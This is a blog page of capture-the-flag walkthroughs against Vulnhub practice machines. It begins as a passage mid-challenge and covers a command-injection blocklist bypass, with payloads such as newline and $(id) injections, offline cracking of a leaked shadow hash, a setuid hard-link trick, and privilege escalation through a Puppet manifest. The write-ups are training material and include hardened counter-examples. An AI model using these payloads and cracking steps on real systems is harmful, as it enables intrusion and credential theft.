==gLu4yZulGa0VWbvNHIy9GIlJXZoRHIkJ3b3N3chBHIhBCZulmZgQHanlWbgU3b5BCLulGIzVGd15WatByMyASbvJnZgMXZtF2ZyF2Vgg2Y0F2dgwyay92dgQ3JuNXZvRGIzlGa0BiZJByaU5EMpdzaKpkZH1jd/g2Y0F2dv02bj5SZiVHd19Weuc3d39yL6MHc0RHaroot@puppet:/root/protovision# cat flag1.txt.0xff | xxd -p -r | rev | base64 -d
https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...

This leads us to the mandatory movie reference, this one from the WarGames scene where the characters discuss back doors: "Mr. Potato Head! Backdoors are not secrets." So 'secrets' may be a password for something.

The characters also go on to correctly guess that 'Joshua' is the back door password in the movie, so I keep that in my back pocket for later. Maybe another password?

Exploring the directory yields a jpeg and then leads us down a rabbit hole of hidden directories.

root@puppet:/root/protovision# ls -la
total 24
drwxr-xr-x 3 root root 4096 Dec 21  2016 .
drwx------ 4 root root 4096 Jan  7 17:49 ..
-rw-r--r-- 1 root root  401 Dec 21  2016 flag1.txt.0xff
drwxr-xr-x 3 root root 4096 Dec 21  2016 .I_have_you_now
-rw-r--r-- 1 root root   39 Dec 17  2016 jim
-rw-r--r-- 1 root root   53 Dec 17  2016 melvin
root@puppet:/root/protovision# cd .I_have_you_now/
root@puppet:/root/protovision/.I_have_you_now# ls
grauniad_1995-02-27.jpeg
root@puppet:/root/protovision/.I_have_you_now# file grauniad_1995-02-27.jpeg 
grauniad_1995-02-27.jpeg: JPEG image data, JFIF standard 1.02
root@puppet:/root/protovision/.I_have_you_now# ls -la
total 84
drwxr-xr-x 3 root root  4096 Dec 21  2016 .
drwxr-xr-x 3 root root  4096 Dec 21  2016 ..
drwxr-xr-x 3 root root  4096 Dec 18  2016 .a
-r-------- 1 root root 71790 Dec 18  2016 grauniad_1995-02-27.jpeg

The jpeg file does have something hidden in the exif data:

root@kali2:~/Desktop# exiftool grauniad_1995-02-27.jpeg 
ExifTool Version Number         : 10.36
File Name                       : grauniad_1995-02-27.jpeg
Directory                       : .
File Size                       : 70 kB
File Modification Date/Time     : 2016:12:22 22:53:22-05:00
File Access Date/Time           : 2016:12:22 22:53:25-05:00
File Inode Change Date/Time     : 2016:12:22 22:53:22-05:00
File Permissions                : rwxr-xr-x
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Software                        : Acorn version 4.5.1
Exif Image Width                : 460
Exif Image Height               : 276
XP Comment                      : SHA1SUM 0a1f5d1ba9f15fd38b6e37734707bfd295a6795c
Padding                         : (Binary data 2060 bytes, use -b option to extract)
JFIF Version                    : 1.02
Image Width                     : 460
Image Height                    : 276
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 460x276
Megapixels                      : 0.127

I was unable to crack the SHA-1 hash, but I hold onto it for later, knowing that knightmare doesn't generally make mistakes or put things in his challenges that aren't connected.

I list out all the subdirectories and am damn glad I didn’t do this by hand.

root@puppet:/root/protovision/.I_have_you_now# find . -type d
.
./.a
./.a/.b
./.a/.b/.c
./.a/.b/.c/.d
./.a/.b/.c/.d/.e
./.a/.b/.c/.d/.e/.f
./.a/.b/.c/.d/.e/.f/.g
./.a/.b/.c/.d/.e/.f/.g/.h
./.a/.b/.c/.d/.e/.f/.g/.h/.i
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x.
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y
./.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z

Heading in I find several files which look to form a private key if assembled properly. At the bottom of this mess I find a file containing the phrase 'joshua', which we earlier established must be useful for something, as well as a gpg-encrypted file that, by its file name, could be an SSH key for a user 'nleeson'.

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# ls
my_world_you_are_persistent_try  nleeson_key.gpg
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# file my_world_you_are_persistent_try 
my_world_you_are_persistent_try: ASCII text
root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# cat my_world_you_are_persistent_try 
joshua

The gpg file decrypts to a private key file as suspected. The password that worked was actually ‘secret’ not ‘secrets’.

root@puppet:/root/protovision/.I_have_you_now/.a/.b/.c/.d/.e/.f/.g/.h/.i/.j/.k/.l/.m/.n/.o/.p/.q/.r/.s/.t/.u./v./w./x./y/.z# gpg -d nleeson_key.gpg 
gpg: CAST5 encrypted data
gpg: gpg-agent is not available in this session
gpg: encrypted with 1 passphrase
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,1864E0393453C88F778D5E02717B8B16
...snip...
-----END RSA PRIVATE KEY-----
gpg: WARNING: message was not integrity protected

I test out the key and am able to SSH to the barringsbank host with the private key and passphrase ‘joshua’ from earlier.

root@puppet:/root# chmod 600 nick_key 
root@puppet:/root# ssh -i nick_key nleeson@192.168.122.3
Enter passphrase for key 'nick_key': 
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 4.4.0-57-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

 System information disabled due to load higher than 1.0


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

nleeson@barringsbank:~$

This system is pretty bare, so I turn back to Puppet for clues. As root on the puppetmaster I can edit /etc/puppet/manifests/site.pp (and nodes.pp to match) so that the barringsbank node also includes wiggle; on its next check-in the agent will install our replacement spin, setuid root, into /tmp on barringsbank. I make this change and wait a bit.

nleeson@barringsbank:~$ cd /tmp
nleeson@barringsbank:/tmp$ ./spin
nleeson@barringsbank:/tmp$ sudo -s
root@barringsbank:/tmp# cd /root
root@barringsbank:/root# ls
me.jpeg

Now we have another image, which I pull down locally and run steghide against. We've come full circle: the phrase 'reticulating splines' is the passphrase.

root@kali:/var/www/html# steghide extract -sf me.jpeg 
Enter passphrase: 
wrote extracted data to "primate_egyptian_flag.txt".
root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt 
674143496741434967414349674143496741434967414349674143496741
69434b34694c7555336235426963765a47497a4e5859694269636c526d62
6c5a4749684279636e556d636c686b430a67414349674143496741434967
41434967414349674143496741434967414349674143494b386c4c743053
4c7538464967414349674143496734534c73414349674143496741434967
4143490a6741434967414349674143496741434967414349674143496741
43496741434967414349674143494b34435967414349674143496763794a
74347958663543586742434938424349674143490a663931586639315866
393158663931586639315875307a4b7273434c6741434967414349674143
4967416943634243496734434c6741795867414349674143496741795867
414358674143490a39305450393054503930545039305450393054503934
796276396d4c666843496741434967414349674143494b77484967414349
3878335838394666663931586639315838783358703831580a3842434967
414349674143496741434967414349674143496e346e6667414349674143
496741434967414349676f41666741434967774866397758503831545039
30545039774866393054500a677746496741434967414349674143496741
434967414349674143496741434967414349674143496741434967414349
4b384349673847497642794a2b424749674143496741794a2b4243490a67
636966674243496741434967414349674143496741434967414349674143
4967414349674143496741434967414349674143494b3843496738474976
4243496741434963426d66764143490a765a47496b355759673457616864
575967553259753947493139576567384764674d6e62766c476468785764
30466d636e353262447067434b41794a7434795866393158753043596741
43490a673847646751575a704a486467556d646e6b6b434b4153496e4647
626d7077637068476467636d62704a5864304258596a4269627642535a74
6c476467674764346c326367554761304269630a734233636852585a7442
7964764a486130425362764a6e5a676b5859334647496c5a336274427962
3042434c6c4a585a6f424364704a474968424363314279636e3557616f52
4849346c57620a3042435a6c6c33627135575a67556d6468684749313957
6567554763766847494a42694c7a646d627068476467515859674d486470
3947627768585a6749575a3342435a75466d43306c32620a774258596755
6d596751476231393264675133596c423363684279637068476467343262
67733259684a475a6c566d5a4b495864766c48496b355759673432627052
6e6376424849304647610a6a563263674d57613046576276525864684279
626b427962304243646c4e48496c4a5859674d58545742535a7a56476130
42434c6c5233627542695a507067437551575a304657616a566d630a674d
335a756c4761304243636c56326167384764675148616e563362674d5861
6f524849764e6e437351585a774258647742795a756c3263314279636c52
58596b425864676b4864704a58640a4331474d6b3557595342434c754e6a
5179314749765248497a746d6268684764676b6e6268316b434b34535a73
4233626c42484979396d5a6767325a31396d626c42795970315759756c48
5a0a354279617546476130424362686c32596c42336367456b434b346952
554e45497a6c47613042795a756c47647a564764674933626d4269657535
57613256326167516d62684269576c5258650a685a6e436c68476467516d
62684279636c646d626c78476268683259675532636c6847646777476268
42795a756c47647a394761674933626d427961786b576230427a5a673847
64675533620a68424364755632596c4a48497a6c4761674933626d426962
7a496d637442796230424364686847496c68476467593262674158613042
53516734535a6a6c6d646b4647496c786d59685648620a765a47496e3557
61723932627342535a7946474931395765675957616749585a3052586133
52484979394749444a565367343262675557624b5158614942694c6c4e6d
6268523363704e33630a30564762773132624442434c7539474976646b43
4b34535a6e35575a737857596f4e6d436c6847646751575a305647627731
32626a42535a324647616749336267516e6270684749684269630a7a526d
626c6c6d6347426963313945496d394749784d43496c5232627a6c47636c
42695a7642534e306f7a4e774179623042434d7a6f6a4e7741694f6c7832
59796c3259675547613042535a0a676f77507534694c7534326270523359
6c356d62764e47496c684764674d334a304647615842694c7555544f3545
4449444a6b51676b79516f414361304a33624f42535a6f526c43756c4549
0a6741434967414349674143496741434967414349674143496741434967
414349674143496741434967414349674143496741434967414349674143
49674143496741434967414349674143490a3d6f515a794657623068325a
70353253743043490a

Looks like hex again, which then decodes to another reversed base64 string. At last, the final flag:

root@kali2-CTP:/var/www/html# cat primate_egyptian_flag.txt | xxd -p -r | rev | base64 -d
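Both flags use the same wrapping, so here is an added example (mine, not part of the original write-up) that does in one function what the xxd -p -r | rev | base64 -d pipeline did for the first flag above and for this one: hex-decode, reverse each line (rev works per line, which is what undoes the line-wrapped base64 of the second flag, whose embedded 0a bytes you can see in the dump), then base64-decode. An encoder is included only to build test vectors; the long message used in the test is the decoded text of the first flag as shown earlier.

```python
import base64


def decode_flag(hex_text: str) -> str:
    """Undo the layering used by both flag files: hex -> per-line reversed base64 -> text.

    Whitespace in the hex dump is ignored, so a line-wrapped dump like the
    second flag decodes directly. Inside the decoded text each line is
    reversed on its own, exactly as `rev` does, and the newlines are then
    dropped the way `base64 -d` ignores them.
    """
    hex_clean = "".join(hex_text.split())
    reversed_text = bytes.fromhex(hex_clean).decode("ascii")
    b64 = "".join(line[::-1] for line in reversed_text.splitlines())
    return base64.b64decode(b64, validate=True).decode("utf-8")


def encode_flag(plaintext: str, wrap: int = 0) -> str:
    """Forward direction, for building test vectors: text -> base64 -> rev -> hex.

    wrap=0 mirrors the first flag (one long line, no trailing newline);
    wrap=76 mirrors the second (base64's default line width, each line reversed).
    """
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    if wrap:
        lines = [b64[i:i + wrap] for i in range(0, len(b64), wrap)]
        reversed_text = "\n".join(line[::-1] for line in lines) + "\n"
    else:
        reversed_text = b64[::-1]
    return reversed_text.encode("ascii").hex()


if __name__ == "__main__":
    sample = encode_flag("Mr Potato Head! Backdoors are not secrets.", wrap=76)
    print(sample)
    print(decode_flag(sample))
```

Pointing decode_flag at the contents of flag1.txt.0xff or primate_egyptian_flag.txt reproduces the two pipelines above; validate=True makes a bad transcription fail loudly instead of silently dropping characters.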

What an awesome, intense, and comprehensive challenge! Thanks to knightmare for making this and to g0tm1lk and the whole vulnhub community for hosting this one! Until next time.

Fortress Vulnhub CTF Walkthrough

4 new VMs dropped on Vulnhub the other day which were created by members of the Vulnhub CTF team for the DefCon Toronto CTF.

I grabbed Fortress by superkojiman first, you can get it here: https://www.vulnhub.com/entry/dc416-2016,168/

Each VM has a landing page which describes the challenge and the number of flags.

I. Discovery

I started off with an nmap scan and didn’t turn up anything other than the standard web and SSH ports.

root@kali~# nmap -sV 172.16.94.143

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-12-06 09:59 EST
Nmap scan report for 172.16.94.143
Host is up (0.00040s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.2 (FreeBSD 20160310; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
443/tcp open  ssl/http Apache httpd 2.4.23 ((FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27)
MAC Address: 00:0C:29:D5:71:50 (VMware)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.06 seconds

I ran Nikto next but did not get anything back so fired up Dirbuster which turned up a scanner.php page pretty quickly.

II. Command Injection

Firing up Burp and sending the request to repeater screams command injection.

Bit of a troll here, tried several tactics and all gave me this result.

Eventually I found that a carriage return would bypass the filter.

Here is the content of scanner.php, which shows what is filtered: the assembled command string is rejected only if it contains ';', '|' or '&', and otherwise goes straight to shell_exec(), so a line break, backticks or $( ) still get through.

<html>
<head>
<title>S C A N N 3 R</title>
<link rel="stylesheet" href="styles.css" type="text/css" />
</head>
<body>

<div class="container">

<form method="POST" action="">
  <input class="form" type="text" name="host" value="127.0.0.1" />
  <input class="button" type="submit" value="Scan Target" />
</form>
<?php

if(isset($_POST['host'])) {
    $cmd = "/usr/local/bin/nmap -F -sT ".$_POST['host'];
    echo "<pre>Command: $cmd\n\n</pre>";

    if (strpos($cmd, ";") !== FALSE || strpos($cmd, "|") !== FALSE || strpos($cmd, "&") !== FALSE) {
        echo "<pre>Nope. Good try though... ?</pre>\n";
    } else {
        $output = shell_exec($cmd);
        echo "<pre>$output</pre>";
    }
}
?>

<img class="logo" src="logo.png">

</div>
</body>
</html>

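To make the bypass concrete, here is an added Python model of the check (my code, not code from the Fortress VM or from superkojiman): blocklist_allows() reproduces scanner.php's three-character test, the BYPASSES dictionary holds constructed payloads that pass it while still handing the shell a second command, and safe_scan_argv() shows the fix a practitioner would want, an allow-list on the input followed by running nmap with an argv list so no shell is involved. The regex, function names and payloads are all mine.

```python
import re
import subprocess

# The three separators scanner.php rejects; anything else reaches shell_exec().
BLOCKED = (";", "|", "&")


def blocklist_allows(host: str) -> bool:
    """Model of the scanner.php check: the full command line is rejected only if it
    contains ';', '|' or '&'. Returns True when the page would run the command."""
    cmd = "/usr/local/bin/nmap -F -sT " + host
    return not any(ch in cmd for ch in BLOCKED)


# Constructed payloads. None of these contain a blocked character, yet each one
# makes the /bin/sh that shell_exec() spawns execute a second command ("id").
BYPASSES = {
    "newline":   "127.0.0.1\nid",     # a bare line feed ends the nmap command
    "crlf":      "127.0.0.1\r\nid",   # what the write-up calls a carriage return
    "subshell":  "127.0.0.1 $(id)",   # command substitution
    "backticks": "127.0.0.1 `id`",
}
# Payloads the filter does catch.
CAUGHT = ["127.0.0.1; id", "127.0.0.1 | id", "127.0.0.1 && id"]

# Hardened version: allow-list the shape of the input, then never involve a shell.
# Dotted-quad IPv4 or an RFC 1123 style hostname; a leading '-' can never match,
# which also stops argument injection such as "-iL /etc/passwd".
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOST_RE = re.compile(r"(?:\d{1,3}(?:\.\d{1,3}){3}|" + _LABEL + r"(?:\." + _LABEL + r")*)")


def safe_scan_argv(host: str) -> list:
    """Return the argv for scanning `host`, or raise ValueError if it fails the allow-list."""
    if not HOST_RE.fullmatch(host):
        raise ValueError("host failed allow-list check: %r" % host)
    return ["/usr/local/bin/nmap", "-F", "-sT", host]


def run_scan(host: str) -> str:
    """Run the scan without a shell: subprocess.run() with a list never invokes
    /bin/sh, so separators and $(...) in `host` are passed through literally."""
    argv = safe_scan_argv(host)
    return subprocess.run(argv, capture_output=True, text=True, check=False).stdout
```

The allow-list matters even with the argv form: without it, a value such as "-iL /etc/passwd" is not a shell injection but is still an nmap option injection.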
I issued a quick find to locate the flag files. It turned up two of the three; the remaining one was sitting in the web root, as shown below. Next I set out to grab each one.

find / -name flag.txt

/usr/home/vulnhub/flag.txt
/usr/home/craven/flag.txt

Flag 1

I found flag 1 hiding in the web root with the following commands.

ls

index.html
k1ngd0m_k3yz
logo.png
s1kr3t
scanner.php
styles.css

ls s1kr3t
flag.txt

cat s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}

Flag 2

For flag 2 I had to dig around the file system a bit more and figure out a password to SSH in. I issued the following commands, which confirmed that I had to gain access as the 'craven' user to read the flag (it is mode 0400 and owned by craven), and which also gave me a hint and a reminders file.

ls -la /usr/home/craven/

drwxr-xr-x  2 craven  craven   512 Nov  9 19:58 .
drwxr-xr-x  4 root    wheel    512 Nov  5 01:59 ..
-rw-r--r--  1 craven  craven  1055 Nov  5 01:59 .cshrc
-rw-------  1 craven  craven     5 Nov  7 20:24 .gdb_history
-rw-r--r--  1 craven  craven    60 Nov  7 20:36 .gdbinit
-rw-r--r--  1 craven  craven   254 Nov  5 01:59 .login
-rw-r--r--  1 craven  craven   163 Nov  5 01:59 .login_conf
-rw-------  1 craven  craven   379 Nov  5 01:59 .mail_aliases
-rw-r--r--  1 craven  craven   336 Nov  5 01:59 .mailrc
-rw-r--r--  1 craven  craven   802 Nov  5 01:59 .profile
-rw-------  1 craven  craven   281 Nov  5 01:59 .rhosts
-rw-r--r--  1 craven  craven   978 Nov  5 01:59 .shrc
-r--------  1 craven  craven    46 Nov  6 01:30 flag.txt
-rw-r--r--  1 craven  craven   119 Nov  5 02:23 hint.txt
-rw-r--r--  1 craven  craven    77 Nov  5 02:20 reminders.txt

cat /usr/home/craven/hint.txt
Keep forgetting my password, so I made myself a hint. Password is three digits followed by my
pet's name and a symbol.

cat /usr/home/craven/reminders.txt
To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha

OK, it looks like I need to create a wordlist of three digits, the pet name qwerty and a special character. The crunch tool can do this for me. The command below gives me only 10-character results: three digits (%), followed by the literal pet name, then one symbol (^).

crunch 10 10 -t %%%qwerty^ > craven.txt
Crunch will now generate the following amount of data: 363000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 33000
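
As an added illustration (not part of the original write-up), the following Python reproduces what the crunch mask does so the 33000-line and 363000-byte figures above can be checked, and generalizes it to crunch's other -t placeholders. CLASSES, hint_mask() and the rest are my names; the symbol set is an assumption reconstructed from the 33 symbols crunch's line count implies, not copied from crunch's source.

```python
import string
from itertools import product
from typing import Iterator

# crunch's -t placeholders: @ lowercase, , uppercase, % digits, ^ symbols.
# The symbol set below is an assumption reconstructed from the run above: 33
# characters (including the space) reproduce crunch's reported 33000 lines.
CLASSES = {
    "@": string.ascii_lowercase,
    ",": string.ascii_uppercase,
    "%": string.digits,
    "^": "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ ",
}


def hint_mask(digits: int, pet: str, symbols: int) -> str:
    """Turn the hint ("three digits, pet's name, a symbol") into a crunch-style mask."""
    return "%" * digits + pet + "^" * symbols


def mask_size(mask: str) -> int:
    """Number of candidates the mask expands to (crunch's 'number of lines')."""
    n = 1
    for ch in mask:
        n *= len(CLASSES.get(ch, ch))   # a literal character contributes exactly one choice
    return n


def mask_bytes(mask: str) -> int:
    """Size of the wordlist on disk: every candidate plus its trailing newline."""
    return mask_size(mask) * (len(mask) + 1)


def expand_mask(mask: str) -> Iterator[str]:
    """Yield candidates with the rightmost placeholder varying fastest, as crunch
    does; literal characters (here the pet's name) stay fixed in place."""
    slots = [CLASSES.get(ch, ch) for ch in mask]
    for combo in product(*slots):
        yield "".join(combo)


def write_wordlist(mask: str, path: str) -> int:
    """Write the expansion to `path`, one candidate per line; returns the line count."""
    count = 0
    with open(path, "w", encoding="ascii") as fh:
        for candidate in expand_mask(mask):
            fh.write(candidate + "\n")
            count += 1
    return count
```

mask_size() is worth running before a real crunch job: a careless mask such as "%%%%%%%%@@" is 10^8 times 26^2 lines and will fill a disk. Literal characters are only taken as-is when they are not themselves one of the four placeholder characters.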

Now, what can I use this for, since the instructions said no SSH brute forcing is needed? Back in the web root, the k1ngd0m_k3yz directory held copies of the /etc/passwd and /etc/master.passwd files (master.passwd being the FreeBSD equivalent of the shadow file), so I could crack the hash offline instead.

ls k1ngd0m_k3yz
master
passwd

cat k1ngd0m_k3yz/passwd
craven:*:1002:1002:User &:/home/craven:/bin/sh

cat k1ngd0m_k3yz/master
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

I saved the two files down, unshadowed them and threw the result into John with my fancy wordlist.

unshadow passwd shadow > to_crack

cat to_crack 
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002:User &:/home/craven:/bin/sh

john --wordlist=craven.txt to_crack

john --show to_crack
craven:931qwerty?:1002:1002:User &:/home/craven:/bin/sh

1 password hash cracked, 0 left

With that password I was able to SSH in and grab the second flag.

ssh -l craven 172.16.94.143
Password for craven@fortress:

$ pwd
/usr/home/craven
$ cat flag.txt
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

Flag 3

The third and final flag was in the /home/vulnhub directory along with a SUID binary.

$ cd /home/vulnhub
$ ls
flag.txt	reader
$ ls -lah
total 56
drwxr-xr-x  2 vulnhub  vulnhub   512B Nov  8 20:27 .
drwxr-xr-x  4 root     wheel     512B Nov  5 01:59 ..
-rw-r--r--  1 vulnhub  vulnhub   1.0K Nov  1 23:43 .cshrc
-rw-r--r--  1 vulnhub  vulnhub   254B Nov  1 23:43 .login
-rw-r--r--  1 vulnhub  vulnhub   163B Nov  1 23:43 .login_conf
-rw-------  1 vulnhub  vulnhub   379B Nov  1 23:43 .mail_aliases
-rw-r--r--  1 vulnhub  vulnhub   336B Nov  1 23:43 .mailrc
-rw-r--r--  1 vulnhub  vulnhub   802B Nov  1 23:43 .profile
-rw-------  1 vulnhub  vulnhub   281B Nov  1 23:43 .rhosts
-rw-r--r--  1 vulnhub  vulnhub   978B Nov  1 23:43 .shrc
-r--------  2 vulnhub  vulnhub    26B Nov  8 20:08 flag.txt
-rwsr-xr-x  1 vulnhub  vulnhub   8.8K Nov  8 20:15 reader

The reader binary asks for a file. I fed it flag.txt and of course it wouldn't read it.

$ ./reader
./reader [file to read]
$ ./reader flag.txt
Checking file type...
Checking if flag file...
Nope. Can't let you have the flag.

I pulled it down to take a look offline. Since we have SSH access, it's easy with SCP.

scp craven@172.16.94.143:/home/vulnhub/reader /var/www/html
Password for craven@fortress:
reader                                        100% 9022     6.5MB/s   00:00

I took the easy route here and also got a bit lucky. I ran strings against the binary and focused on this section.

%s [file to read]
Checking file type...
Symbolic links not allowed!
Checking if flag file...
flag
Nope. Can't let you have the flag.
Great! Printing file contents...
Win, here's your flag: 

So based on this it looked like I may be able to read the file if I point the binary at another name that does not contain 'flag'. Symbolic links are explicitly rejected (presumably an lstat() on the path given), but a hard link, ln without -s, is not a symlink at all: it is a second directory entry for the same inode, so both the symlink check and the filename check pass while the binary still opens the flag's data. This only works if /tmp is on the same filesystem as the target and the kernel allows hard-linking a file you cannot read (FreeBSD's security.bsd.hardlink_check_uid sysctl, or fs.protected_hardlinks on Linux, would block it).

$ cd /tmp
$ ln /home/vulnhub/flag.txt test
$ cd /home/vulnhub/
$ ./reader /tmp/test 
Checking file type...
Checking if flag file...
Great! Printing file contents...
Win, here's your flag: 
FLAG{its_A_ph0t0_ph1ni5h}

Sweet, it worked! There are likely other paths but this worked for me.
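
To show why the hard link works where the symlink does not, here is an added Python model (mine, not the reader binary's source, which the page does not include). reader_checks() does what the strings suggest the binary does, refusing symlinks and names containing 'flag'; hardened_checks() is the fix, comparing the (st_dev, st_ino) identity of the file actually opened against the protected file; demo() builds a constructed flag, a symlink and a hard link in a temporary directory and runs both checks over them.

```python
import os
import stat
import tempfile


def reader_checks(path: str) -> str:
    """Model of what the strings in `reader` suggest it does: refuse symlinks (an
    lstat() on the name given) and refuse a file name containing 'flag'. Names only."""
    if stat.S_ISLNK(os.lstat(path).st_mode):
        return "Symbolic links not allowed!"
    if "flag" in os.path.basename(path):
        return "Nope. Can't let you have the flag."
    return "Great! Printing file contents..."


def hardened_checks(path: str, protected: str) -> str:
    """Decide on the identity of the file actually opened, not on its name.

    O_NOFOLLOW makes open() fail on a symlink, and fstat() on the descriptor we
    would read from closes the check/use window. A hard link has a different
    name but the same (st_dev, st_ino) as the protected file, so it is refused too.
    """
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:
        return "Symbolic links not allowed!"
    try:
        opened = os.fstat(fd)
    finally:
        os.close(fd)
    guard = os.stat(protected)
    if (opened.st_dev, opened.st_ino) == (guard.st_dev, guard.st_ino):
        return "Nope. Can't let you have the flag."
    return "Great! Printing file contents..."


def demo() -> dict:
    """Constructed scenario: a flag file, a symlink to it, a hard link to it and an
    unrelated file, each run through both versions of the check."""
    with tempfile.TemporaryDirectory() as d:
        flag = os.path.join(d, "flag.txt")
        other = os.path.join(d, "notes.txt")
        for p, body in ((flag, "FLAG{constructed}\n"), (other, "nothing here\n")):
            with open(p, "w") as fh:
                fh.write(body)
        sym = os.path.join(d, "sym")
        hard = os.path.join(d, "test")      # same name the write-up used
        os.symlink(flag, sym)
        os.link(flag, hard)                 # `ln` without -s
        return {
            "flag_nlink": os.stat(flag).st_nlink,   # 2 once the hard link exists
            "naive_symlink": reader_checks(sym),
            "naive_hardlink": reader_checks(hard),
            "naive_other": reader_checks(other),
            "hardened_symlink": hardened_checks(sym, flag),
            "hardened_hardlink": hardened_checks(hard, flag),
            "hardened_other": hardened_checks(other, flag),
        }
```

The link count reported by ls -l (the second column) is the quick tell for a defender: a supposedly private file with st_nlink greater than one has another name somewhere on the filesystem.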

Thanks to superkojiman for putting this CTF together and making it available via Vulnhub. As always thanks to g0tmi1k and the entire Vulnhub team for maintaining these resources.

Metasploitable 3 without Metasploit Part 1

I was excited to see the latest version of Metasploitable provided us with a vulnerable Windows target to practice on. Building and configuring was not difficult once you have all of the dependencies down.  I won’t get too deep into building the box but here are the basics of what I did:

Using a fresh install of Windows 10, I downloaded VirtualBox 5.0.30, Vagrant 1.8.7 and the latest version of Packer, 0.12.0.

I cloned the Git repository here: https://github.com/rapid7/metasploitable3

I decided to be lazy and use the included PowerShell script to auto-build it; I just had to make the following version-check changes in the script so it would run with what I had installed.

I changed:

$virtualBoxMinVersion = "5.1.6"
$packerMinVersion = "0.10.0"
$vagrantMinVersion = "1.8.6"
$vagrantreloadMinVersion = "0.0.1"

to:

$ErrorActionPreference = "Stop"

$virtualBoxMinVersion = "5.0.30"
$packerMinVersion = "0.12.0"
$vagrantMinVersion = "1.8.7"
$vagrantreloadMinVersion = "0.0.1"

This ran for a while, but once it was done I typed

vagrant up

and let this run for a while to pull in all of the configurations. Once this completed I loaded it in VirtualBox and logged in with the credentials vagrant/vagrant to make sure it was working properly. I then exported from VirtualBox as an .ova and imported into my VMware lab set up.

If you have any issues with the set up feel free to leave a comment or hit me up on Twitter.

Here’s a quick walk through for one path to local access as well as privilege escalation using mostly manual techniques.

I started off with an nmap scan of all ports to identify running services.

root@mrb3n:~# nmap -sV -p- -T4 192.168.253.143

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-03 17:22 EST
Nmap scan report for 192.168.253.143
